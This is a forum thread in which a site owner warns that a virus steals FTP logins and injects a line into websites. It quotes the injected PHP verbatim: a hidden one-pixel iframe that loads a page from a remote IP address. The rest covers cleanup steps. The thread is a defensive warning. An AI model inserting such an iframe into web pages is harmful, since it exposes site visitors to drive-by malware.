PupStar Posted March 3, 2010 Share Posted March 3, 2010 Hi Guys, Just to let you know that there is an iframe virus on the prowl on the world wide web that once your pc is infected it accesses your ftp info and uploads this line to your site(s) <?php echo '<iframe src="http://91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe>'; ?> Its a bit of a bitch to get rid of, eset detected it but would not clean it and neither would AVG. The only AV that I have found that sorts it out is F-Secure. Once my pc was clean I changed all of my passwords to my ftp accounts and also had to download and remove the above line from all index.php and index.html files. Other files were affected as well but these were the main ones. I am now in the process of wiping my public_html folder and reuploading the clean files. I only knew about this virus after google emailed me to say they were blacklisting my sites until I had removed the offending malware code. Anyway I hope this is useful info for people. Regards PS Link to comment Share on other sites More sharing options...
spooks Posted March 3, 2010 Share Posted March 3, 2010 Thanks for the heads up, would you mind saying what the virus is called? Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
PupStar Posted March 3, 2010 Author Share Posted March 3, 2010 Thanks for the heads up, would you mind saying what the virus is called? hehe yeah sorry I should have said DOH! The virus is called 'IFrame.B.Gen' and should be watched for. Ensure your pc virus protection is uptodate. Regards PS Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.